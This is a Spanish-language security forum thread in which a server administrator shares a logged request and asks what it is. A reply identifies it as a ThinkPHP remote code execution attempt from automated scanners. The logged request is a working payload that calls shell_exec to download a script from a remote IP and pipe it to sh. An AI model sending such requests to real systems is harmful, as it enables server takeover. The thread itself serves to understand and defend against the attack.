elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Peticiones al servidor usando Yii PHP Framework		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Peticiones al servidor usando Yii PHP Framework  (Leído 4,390 veces)
warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Peticiones al servidor usando Yii PHP Framework
« en: 13 Marzo 2021, 19:38 pm »
Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:

Código:
Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh

Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework

el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.

a ver si alguien tiene mas conocimientos sobre el tema
En línea
HE SIDO BANEADO --- UN PLACER ---- SALUDOS
el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 21.637


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: Peticiones al servidor usando Yii PHP Framework
« Respuesta #1 en: 17 Marzo 2021, 00:19 am »
¿Qué user agent hace la petición?

ThinkPHP Remote Code Execution (RCE)

Usarán alguna herramienta automatizada tipo Nuclei Scanner
https://github.com/projectdiscovery/nuclei

Hay un montón de variantes:
https://www.exploit-db.com/exploits/46150

Ahora la petición estrella es OWA de Microsoft Exchange
Código:
GET /owa/auth/logon.aspx
En línea
warcry.


Desconectado Desconectado

Mensajes: 1.004


Ver Perfil
Re: Peticiones al servidor usando Yii PHP Framework
« Respuesta #2 en: 19 Marzo 2021, 19:32 pm »
Cita de: el-brujo en 17 Marzo 2021, 00:19 am
¿Qué user agent hace la petición?



Código:
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
En línea
HE SIDO BANEADO --- UN PLACER ---- SALUDOS
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Hay alguna manera de hacer un chat sin hacer muchas peticiones al servidor?
Desarrollo Web 		70N1 0 1,975 Último mensaje 20 Marzo 2013, 01:27 am
por 70N1
Que cantidad de peticiones harían caer un servidor web?
Hacking 		moskita789 4 8,422 Último mensaje 1 Octubre 2013, 20:46 pm
por crazykenny
Inyeccion sql, el servidor me impide el acceso tras muchas peticiones seguidas
Hacking 		ukraniano 0 2,081 Último mensaje 27 Diciembre 2013, 18:42 pm
por ukraniano
Servidor de juegos usando cgi-bin?
Desarrollo Web 		Vaagish 7 2,721 Último mensaje 20 Junio 2014, 22:37 pm
por Vaagish
ayuda necesito ver peticiones cliente servidor
Programación General 		blinkking 2 2,610 Último mensaje 6 Agosto 2018, 07:05 am
por EdePC
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines